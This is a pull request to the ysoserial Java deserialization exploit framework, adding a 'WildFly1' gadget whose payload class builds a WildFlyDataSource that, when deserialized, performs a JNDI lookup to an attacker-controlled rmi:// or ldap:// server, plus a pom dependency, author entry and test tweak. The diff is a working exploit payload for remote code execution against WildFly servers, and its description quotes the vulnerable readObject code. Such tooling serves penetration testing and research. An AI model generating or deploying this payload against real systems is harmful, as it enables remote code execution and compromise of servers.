### PR TITLE
new gadget : WildFly1.java

### DIFF
--- a/pom.xml
+++ b/pom.xml
@@ -336,6 +336,11 @@
             <artifactId>click-nodeps</artifactId>
             <version>2.3.0</version>
         </dependency>
+        <dependency>
+            <groupId>org.wildfly</groupId>
+            <artifactId>wildfly-connector</artifactId>
+            <version>26.0.1.Final</version>
+        </dependency>
 	</dependencies>
 
 	<profiles>

--- a/src/main/java/ysoserial/payloads/WildFly1.java
+++ b/src/main/java/ysoserial/payloads/WildFly1.java
@@ -1,0 +1,45 @@
+package ysoserial.payloads;
+
+import org.jboss.as.connector.subsystems.datasources.WildFlyDataSource;
+
+
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.annotation.PayloadTest;
+import ysoserial.payloads.util.PayloadRunner;
+
+/**
+ *
+ * Gadget chain:
+ * 
+ * org.jboss.as.connector.subsystems.datasources.WildFlyDataSource.readObject()
+ * javax.naming.InitialContext.lookup()
+ * 
+ *
+ * Arguments: - (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>
+ *
+ *
+ * @author hugov
+ *         https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html
+ * 
+ */
+@PayloadTest(harness = "ysoserial.test.payloads.JRMPReverseConnectTest")
+@Dependencies({ "org.jboss.as:jboss-as-connector:7.1.3.Final"})
+@Authors({ Authors.HUGOW })
+public class WildFly1 implements ObjectPayload<Object> {
+
+    public Object getObject ( String command ) throws Exception {
+
+        // validate command
+        if (!(command.startsWith("ldap://") || command.startsWith("rmi://")))
+            throw new IllegalArgumentException(
+                    "Command format is: " + "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>");
+
+        return new WildFlyDataSource(null, command);
+    }
+
+        public static void main ( final String[] args ) throws Exception {
+        PayloadRunner.run(WildFly1.class, args);
+    }
+    
+}

--- a/src/main/java/ysoserial/payloads/annotation/Authors.java
+++ b/src/main/java/ysoserial/payloads/annotation/Authors.java
@@ -25,6 +25,7 @@ public @interface Authors {
     String EDOARDOVIGNATI = "EdoardoVignati";
     String JANG = "Jang";
     String ARTSPLOIT = "artsploit";
+    String HUGOW = "hugow";
 
     String[] value() default {};
 

--- a/src/test/java/ysoserial/test/payloads/JRMPReverseConnectTest.java
+++ b/src/test/java/ysoserial/test/payloads/JRMPReverseConnectTest.java
@@ -51,7 +51,7 @@ public class JRMPReverseConnectTest implements CustomTest {
 
 
     public String getPayloadArgs () {
-        return "rmi:localhost:" + port;
+        return "rmi://127.0.0.1:" + port + "/ExportObject";
     }
 
 }


### PR DESCRIPTION
I found a new gadget in Wildfly, it's in the wildfly-connector component. The gadget is really simple, it performs a JNDI connection:

```
File: WildFlyDataSource.java
113:     private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException {
114:         in.defaultReadObject();
115:         jndiName = (String) in.readObject();
116: 
117: 
118:         try {
119:             InitialContext context = new InitialContext();
120: 
121:             DataSource originalDs = (DataSource) context.lookup(jndiName);
[...]
```